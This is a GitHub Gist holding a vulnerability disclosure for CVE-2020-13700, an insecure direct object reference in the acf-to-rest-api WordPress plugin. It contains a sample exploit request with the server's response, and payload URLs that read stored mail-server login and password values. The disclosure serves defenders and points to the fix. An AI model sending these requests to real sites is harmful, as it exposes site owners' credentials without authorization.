Last active
June 29, 2020 11:56
-
-
Save mariuszpoplawski/b5fc9fdbf5469ed139e114a913dcf3ba to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CVE-2020-13700 | |
------------------------------------------ | |
[Suggested description] | |
An issue was discovered in the acf-to-rest-api WordPress plugin up to version 3.1.0. It allowed insecure direct object reference via permalinks manipulation, as demonstrated in a wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as login and pass values. | |
------------------------------------------ | |
[Additional Information] | |
During penetration test we have found that the logic of ACF can be abused by sending crafted URI and overriding parameters in permalinks using $_GET parameter. There is a possibility to read Wordpress settings saved in "wp_options" table. | |
To reproduce the vulnerability, we have to send a request with usage of wp-json ACF in format "wp-json/acf/v3/options/a", where we defined a value "id" of options as "a". Then, we have to override the parameter by sending $_GET "id" and "field" to compose full meta_key name that is valid in wp_options table. As a result, server will return a meta_value in the response. | |
Example request to takeover "active_plugins" key and get full list of activated plugins in current installation: | |
GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1 | |
Server response: | |
HTTP/1.1 200 OK | |
Content-Type: application/json; charset=UTF-8 | |
{"plugins":["acf-better-search\/acf-better-search.php","acf-to-rest-api\/class-acf-to-rest-api.php", | |
"advanced-custom-fields-pro\/acf.php","advanced-custom-fields\/acf.php"]}` | |
Example payloads: | |
https://VulnerableDomain.com/wp-json/acf/v3/options/a?id=admin&field=email | |
https://VulnerableDomain.com/wp-json/acf/v3/options/a?id=mailserver&field=login | |
https://VulnerableDomain.com/wp-json/acf/v3/options/a?id=mailserver&field=pass | |
------------------------------------------ | |
[VulnerabilityType Other] | |
Insecure direct object reference via permalinks manipulation | |
------------------------------------------ | |
[Vendor of Product] | |
https://github.com/airesvsg/acf-to-rest-api | |
------------------------------------------ | |
[Affected Product Code Base] | |
wordpress acf-to-rest-api plugin - affected <= 3.1.0 | |
------------------------------------------ | |
[Affected Component] | |
options fetching | |
------------------------------------------ | |
[Attack Type] | |
Remote | |
------------------------------------------ | |
[Impact Information Disclosure] | |
true | |
------------------------------------------ | |
[Reference] | |
https://github.com/airesvsg/acf-to-rest-api | |
https://wordpress.org/plugins/acf-to-rest-api/#developers | |
------------------------------------------ | |
[Discoverer] | |
Mariusz Popławski | |
------------------------------------------ | |
FIX at: | |
https://github.com/airesvsg/acf-to-rest-api/commit/fb9859c5c2f7c0e375cf86e39bce0629f673e52b | |
Mariusz Popławski / AFINE.com team |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment